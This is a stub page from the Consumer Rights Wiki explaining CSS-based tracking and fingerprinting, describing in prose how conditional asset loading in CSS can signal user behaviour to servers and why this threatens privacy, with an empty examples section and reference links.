Consumer Rights Wiki

CSS tracking

Revision as of 01:05, 26 April 2026 by Rudxain (talk | contribs) (Created page with "{{StubNotice}} '''CSS-based tracking''' and '''CSS fingerprinting,''' consist on abusing the semantics of CSS, in order to trick web-browsers to send data to servers. ==How it works== CSS can declare that certain resources/assets be used ''if'' certain conditions are met.<ref>https://developer.mozilla.org/en-US/docs/Web/CSS/Guides/Media_queries</ref> Since browsers implement lazy-loading, thi...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

This article is a stub. You can help by expanding it.

A moderator needs to check the page before this notice can be removed. Visit the noticeboard or the #appeals channel in either Zulip or Discord to request removal.
More info ▼

An article may be flagged as a stub when it is missing major elements needed to make it useful to a reader. You can help by adding missing sections, verifiable sources, relevant company policies and communications, etc. to make the article more complete.

CSS-based tracking and CSS fingerprinting, consist on abusing the semantics of CSS, in order to trick web-browsers to send data to servers.

How it works

CSS can declare that certain resources/assets be used if certain conditions are met.[1] Since browsers implement lazy-loading, this means that assets will only be requested when the conditions are met. This effectively allows pinging arbitrary URLs when a client-side event happens. Instead of referencing a single endpoint for all events, each event can be associated to a different URL, allowing the tracking-"server" to gather more data about user behavior.[2][3]

Traditionally, CSS tracking was (and still is) implemented as a limited fingerprinter, typically by enumerating installed fonts and checking window dimensions.[citation needed]

Either way, the attack has limitations, as caching avoids (no guarantee) repeated requests from happening.

Why it is a problem

This is an insidious practice, as CSS is widely believed to be "just a declarative styling language", even though it's practically Turing-complete.[4][5] Even privacy-minded users have this misconception, which makes them equally vulnerable to this class of tracking.[citation needed] Most people believe that simply disabling Javascript is enough. This attack breaks the expectation that HTML and CSS can only be used to make static/passive documents.

Examples

Some examples of CSS tracking include:

*
*
*

Add your text below this box. Once this section is complete, delete this box by clicking on it and pressing backspace.


References

  1. https://developer.mozilla.org/en-US/docs/Web/CSS/Guides/Media_queries
  2. https://www.mike-gualtieri.com/posts/stealing-data-with-css-attack-and-defense
  3. https://portswigger.net/research/inline-style-exfiltration
  4. https://lyra.horse/x86css/
  5. https://lyra.horse/css-clicker/
Retrieved from "https://consumerrights.wiki/index.php?title=CSS_tracking&oldid=52314"